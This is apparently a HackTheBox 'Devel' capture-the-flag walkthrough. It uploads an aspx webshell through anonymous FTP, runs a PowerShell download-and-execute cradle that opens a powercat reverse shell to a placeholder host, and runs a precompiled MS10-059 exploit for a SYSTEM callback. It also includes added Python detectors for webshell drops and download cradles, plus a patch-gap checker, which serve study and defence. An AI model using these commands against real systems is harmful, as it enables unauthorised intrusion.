hackthebox – devel – windows

Start with a full port scan using nmap.

# nmap 10.10.10.5 -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-08 01:05 EDT
Nmap scan report for 10.10.10.5
Host is up (0.16s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 310.01 seconds

Check whether anonymous FTP access is allowed.

# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
ftp> 

Nice, anonymous login works. Next, check whether we can also write to that directory. I have already tested this and we can.

HTTP shows the server has IIS installed.

We can upload an aspx webshell over FTP and then reach it over HTTP. Kali already ships with one.

# cp /usr/share/webshells/aspx/cmdasp.aspx ./

# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.

ftp> put cmdasp.aspx
local: cmdasp.aspx remote: cmdasp.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (9.0474 MB/s)
aspx webshell
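The core weakness on this box is that the FTP root and the IIS web root are the same directory and anonymous users can write to it, so anything uploaded with a script extension runs the moment it is requested over HTTP. As an added example (not code from the original write-up or from any tool used in it), the Python below correlates the IIS FTP log with the IIS site log and flags exactly that sequence: a STOR of a script file into the web root followed by an HTTP request for it. The log lines are constructed to look like IIS 7.5 W3C logs, and the web root path is an assumption.

```python
"""Correlate IIS FTP uploads with IIS HTTP requests to spot web shell drops (added example)."""
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Extensions IIS hands to a script handler (or runs) instead of serving as static content.
SCRIPT_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".svc", ".php", ".exe"}
# Assumption for this example: the FTP site and the default web site share this root.
WEB_ROOT = PureWindowsPath(r"C:\inetpub\wwwroot")

# Constructed sample shaped like an IIS FTP 7.5 W3C log: an anonymous session uploads two files.
FTP_LOG = r"""#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2019-06-08 05:10:01 10.10.14.2 - 10.10.10.5 21 USER anonymous 331 0 0 1a2b -
2019-06-08 05:10:02 10.10.14.2 anonymous 10.10.10.5 21 PASS *** 230 0 0 1a2b /
2019-06-08 05:10:20 10.10.14.2 anonymous 10.10.10.5 21 STOR cmdasp.aspx 226 0 0 1a2b C:\inetpub\wwwroot\cmdasp.aspx
2019-06-08 05:10:40 10.10.14.2 anonymous 10.10.10.5 21 STOR notes.png 226 0 0 1a2b C:\inetpub\wwwroot\notes.png
"""

# Constructed sample shaped like the IIS HTTP W3C log of the web site on the same host.
HTTP_LOG = r"""#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2019-06-08 05:09:50 10.10.10.5 GET /iisstart.htm - 80 - 10.10.14.2 Mozilla/5.0 200 0 0 15
2019-06-08 05:11:05 10.10.10.5 GET /cmdasp.aspx - 80 - 10.10.14.2 Mozilla/5.0 200 0 0 312
2019-06-08 05:11:30 10.10.10.5 POST /cmdasp.aspx - 80 - 10.10.14.2 Mozilla/5.0 200 0 0 640
2019-06-08 05:12:00 10.10.10.5 GET /notes.png - 80 - 10.10.14.2 Mozilla/5.0 200 0 0 5
"""


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the file's own #Fields: line."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):  # other directives such as #Software, #Version, #Date
            continue
        if fields is None:
            raise ValueError("log record appears before a #Fields: header")
        # W3C logs write '-' for empty values, so every record has the full column set.
        yield dict(zip(fields, line.split()))


def _when(rec):
    return datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")


def find_webshell_drops(ftp_log, http_log, window=timedelta(hours=24)):
    """Return one alert per script file written over FTP into the web root and then requested over HTTP."""
    uploads = {}
    for rec in parse_w3c(ftp_log):
        if rec["cs-method"] != "STOR" or rec["x-fullpath"] == "-":
            continue
        path = PureWindowsPath(rec["x-fullpath"])
        if path.suffix.lower() not in SCRIPT_EXTENSIONS:
            continue  # images and documents are served, not executed
        try:
            relative = path.relative_to(WEB_ROOT)
        except ValueError:
            continue  # written outside the web root, so not reachable over HTTP
        uri = "/" + relative.as_posix().lower()
        uploads[uri] = {
            "uri": uri,
            "uploaded_by": rec["cs-username"],
            "anonymous_upload": rec["cs-username"].lower() == "anonymous",
            "uploaded_at": _when(rec),
            "first_request_at": None,
            "requests": 0,
        }

    for rec in parse_w3c(http_log):
        hit = uploads.get(rec["cs-uri-stem"].lower())
        if hit is None:
            continue
        ts = _when(rec)
        if not (hit["uploaded_at"] <= ts <= hit["uploaded_at"] + window):
            continue
        hit["requests"] += 1
        if hit["first_request_at"] is None:
            hit["first_request_at"] = ts

    return [a for a in uploads.values() if a["requests"] > 0]


if __name__ == "__main__":
    for alert in find_webshell_drops(FTP_LOG, HTTP_LOG):
        print(f"{alert['uri']}: uploaded by {alert['uploaded_by']} at {alert['uploaded_at']}, "
              f"requested {alert['requests']} time(s), first at {alert['first_request_at']}")
```

Run as-is it prints a single alert for /cmdasp.aspx; the PNG upload is ignored because IIS serves it as static content, and iisstart.htm is ignored because it was never uploaded. The real fix is to stop anonymous FTP from writing into the web root at all; the detection is for the case where that has already happened.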

We can now execute arbitrary Windows commands from the webshell. Let’s get a proper reverse shell using nc and powercat.

To get powercat, clone it from GitHub.

# git clone https://github.com/besimorhino/powercat.git
Cloning into 'powercat'...
remote: Enumerating objects: 232, done.
remote: Total 232 (delta 0), reused 0 (delta 0), pack-reused 232
Receiving objects: 100% (232/232), 52.01 KiB | 72.00 KiB/s, done.
Resolving deltas: 100% (71/71), done.

# cd powercat/

Now start a web server locally so that devel can download powercat from us.

# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Also, make sure you listen for the reverse shell.

# nc -lvnp 443

Now enter the following command in the webshell:

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://YOUR-IP/powercat.ps1');powercat -c YOUR-IP -p 443 -e cmd"

NOTE: CHANGE YOUR-IP to your local IP address

You should get a shell.

# nc -lvnp 443
listening on [any] 443 ...
connect to [YOUR-IP] from (UNKNOWN) [10.10.10.5] 49163
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web

Nice, we got a low priv shell.
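The download cradle above leaves a very recognisable process tree on the target: w3wp.exe (the IIS worker) spawns cmd.exe, which spawns powershell.exe with IEX and DownloadString on the command line, all running as the application pool identity (iis apppool\web, as whoami showed). As an added example (not from the original write-up), the Python below triages constructed process-creation events and flags those three indicators. Field names follow Sysmon Event ID 1; the events themselves are made up, apart from the command line, which is the one used above.

```python
"""Triage process-creation events for the IIS-worker-to-PowerShell pattern (added example)."""
import re
from pathlib import PureWindowsPath

WEB_WORKERS = {"w3wp.exe"}                       # IIS application pool worker process
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Both halves of a download cradle: something that executes a string, and something that fetches it.
CRADLE_EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)
CRADLE_FETCH = re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b",
                          re.IGNORECASE)

# Constructed sample events using Sysmon Event ID 1 field names.
EVENTS = [
    {"Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r'c:\windows\system32\inetsrv\w3wp.exe -ap "Web" -v "v4.0"',
     "User": r"IIS APPPOOL\Web"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": r'"cmd.exe" /c whoami',
     "User": r"IIS APPPOOL\Web"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('
                    "'http://YOUR-IP/powercat.ps1');powercat -c YOUR-IP -p 443 -e cmd\"",
     "User": r"IIS APPPOOL\Web"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -File C:\Scripts\backup.ps1",
     "User": r"DEVEL\babis"},  # an interactive user running a script: not flagged
]


def triage(events):
    """Return the events that match at least one indicator, with the reasons for each."""
    findings = []
    for index, ev in enumerate(events):
        reasons = []
        image = PureWindowsPath(ev["Image"]).name.lower()
        parent = PureWindowsPath(ev["ParentImage"]).name.lower()
        cmd = ev.get("CommandLine", "")
        user = ev.get("User", "")

        # 1. A web server worker should not be starting command interpreters.
        if parent in WEB_WORKERS and image in SHELLS:
            reasons.append(f"web server worker {parent} spawned {image}")
        # 2. Execute-what-you-download on the command line, regardless of parent.
        if CRADLE_EXEC.search(cmd) and CRADLE_FETCH.search(cmd):
            reasons.append("PowerShell download-and-execute cradle in command line")
        # 3. Shells running as an IIS app pool identity, even if the direct parent looks benign.
        if image in SHELLS and user.upper().startswith("IIS APPPOOL\\"):
            reasons.append("shell running under an IIS application pool identity")

        if reasons:
            findings.append({"index": index, "image": image, "user": user, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"event {f['index']} ({f['image']} as {f['user']}):")
        for r in f["reasons"]:
            print("  -", r)
```

The third indicator is the one that survives tricks like inserting an extra cmd.exe hop between the worker and PowerShell: the account running the shell is still the app pool identity.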

To root

For privilege escalation, we can either do manual enumeration or use Windows Exploit Suggester. I used the latter.

Download it from GitHub.

# cd /opt
# git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester
# cd Windows-Exploit-Suggester
# pip install xlrd --upgrade
# ./windows-exploit-suggester.py --update

In the low priv shell, run the following command to get the system details.

c:\windows\system32\inetsrv>systeminfo
systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 ��
System Boot Time:          10/6/2019, 7:53:53 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~1996 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.024 MB
Available Physical Memory: 694 MB
Virtual Memory: Max Size:  2.048 MB
Virtual Memory: Available: 1.482 MB
Virtual Memory: In Use:    566 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5

Nice! Save this output to a file named systeminfo.txt.

We can now run Windows Exploit Suggester against it:

# ./windows-exploit-suggester.py --database 2019-06-09-mssb.xls --systeminfo systeminfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits
[*] there are now 179 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 32-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

Great! We see several privilege escalation vulnerabilities. I will try some of the [E] ones; feel free to use the [M] ones with Metasploit.
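Windows Exploit Suggester works by taking the KB numbers of the hotfixes listed by systeminfo and subtracting them from the KB numbers attached to each bulletin in the MSSB spreadsheet; with Hotfix(s): N/A there is nothing to subtract, which is why it compares 0 hotfixes and all 179 bulletins remain. The Python below is an added example (not the suggester's own code) that reproduces that comparison on constructed systeminfo excerpts based on the output above, once for the unpatched box and once for a hypothetical variant with two fixes installed. It does not model patch supersedence, so treat it as an illustration of the mechanism rather than a replacement for the tool.

```python
"""Patch-gap check in the style of Windows Exploit Suggester (added example)."""
import re

# Constructed excerpt based on the systeminfo output above: no hotfixes at all.
SYSTEMINFO_UNPATCHED = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
"""

# Constructed variant: the same host after installing the fixes for MS10-059 and MS11-011.
SYSTEMINFO_PARTIALLY_PATCHED = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB982799
                           [02]: KB2393802
Network Card(s):           1 NIC(s) Installed.
"""

# The bulletin lines reported by the suggester above; the number in parentheses is the KB article.
BULLETINS = """\
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
"""

BULLETIN_LINE = re.compile(r"^\[([EM])\]\s+(MS\d{2}-\d{3}):\s+(.+?)\s+\((\d+)\)\s+-\s+(\w+)\s*$")


def parse_systeminfo(text):
    """Return the 'Key: value' pairs plus a 'hotfixes' set of installed KB numbers (digits only)."""
    info = {"hotfixes": set()}
    lines = text.splitlines()
    for idx, line in enumerate(lines):
        m = re.match(r"^([A-Za-z][^:]*):\s*(.*)$", line)
        if not m:
            continue  # indented continuation lines are handled by their parent key
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Hotfix(s)":
            # Value is either "N/A" or "<n> Hotfix(s) Installed." followed by indented "[nn]: KBxxxxxx" lines.
            for follow in lines[idx + 1:]:
                if not follow.startswith(" "):
                    break
                kb = re.search(r"KB(\d+)", follow)
                if kb:
                    info["hotfixes"].add(kb.group(1))
        else:
            info[key] = value
    return info


def parse_bulletins(text):
    """Parse suggester-style bulletin lines; '[*]' status lines and anything else are skipped."""
    out = []
    for line in text.splitlines():
        m = BULLETIN_LINE.match(line.strip())
        if m:
            out.append({"kind": m.group(1), "id": m.group(2), "title": m.group(3),
                        "kb": m.group(4), "severity": m.group(5)})
    return out


def missing_bulletins(systeminfo_text, bulletin_text, keyword=None):
    """Bulletin IDs whose KB is not installed, optionally filtered by a phrase in the title."""
    installed = parse_systeminfo(systeminfo_text)["hotfixes"]
    result = []
    for b in parse_bulletins(bulletin_text):
        if b["kb"] in installed:
            continue
        if keyword and keyword.lower() not in b["title"].lower():
            continue
        result.append(b["id"])
    return result


if __name__ == "__main__":
    for label, text in (("unpatched", SYSTEMINFO_UNPATCHED), ("partially patched", SYSTEMINFO_PARTIALLY_PATCHED)):
        ids = missing_bulletins(text, BULLETINS, keyword="Elevation of Privilege")
        print(f"{label}: {len(ids)} EoP bulletins missing: {', '.join(ids)}")
```

With the keyword filter the unpatched excerpt yields the six elevation-of-privilege bulletins from the list above; the partially patched variant drops MS10-059 and MS11-011 because their KB numbers (982799 and 2393802) now appear in the hotfix list.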

At first I tried MS11-011, which didn’t work for me, so I moved on to the next one, MS10-059.

You can get the pre-compiled binary from https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS10-059/MS10-059.exe or compile it on your Kali machine using mingw32. I used the pre-compiled one.

Download the binary and upload it using FTP. Make sure to set binary mode before uploading the exe, otherwise the transfer corrupts it.

# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> binary
200 Type set to I.
ftp> put MS10-059.exe
local: MS10-059.exe remote: MS10-059.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
784384 bytes sent in 1.29 secs (592.8402 kB/s)

Before we execute it we need to listen on a port for the shell.

# nc -lvnp 4444

From the previous low priv shell, run it.

c:\inetpub\wwwroot>MS10-059.exe
MS10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
c:\inetpub\wwwroot>MS10-059.exe YOUR-IP 4444
MS10-059.exe YOUR-IP 4444

NOTE: CHANGE YOUR-IP to your local IP address

You will get a high priv shell.

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [YOUR-IP] from (UNKNOWN) [10.10.10.5] 49160
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\inetpub\wwwroot>whoami
whoami
nt authority\system

If you wish you can read the flags now:

c:\> type c:\Users\babis\Desktop\user.txt.txt
c:\> type c:\Users\Administrator\Desktop\root.txt.txt
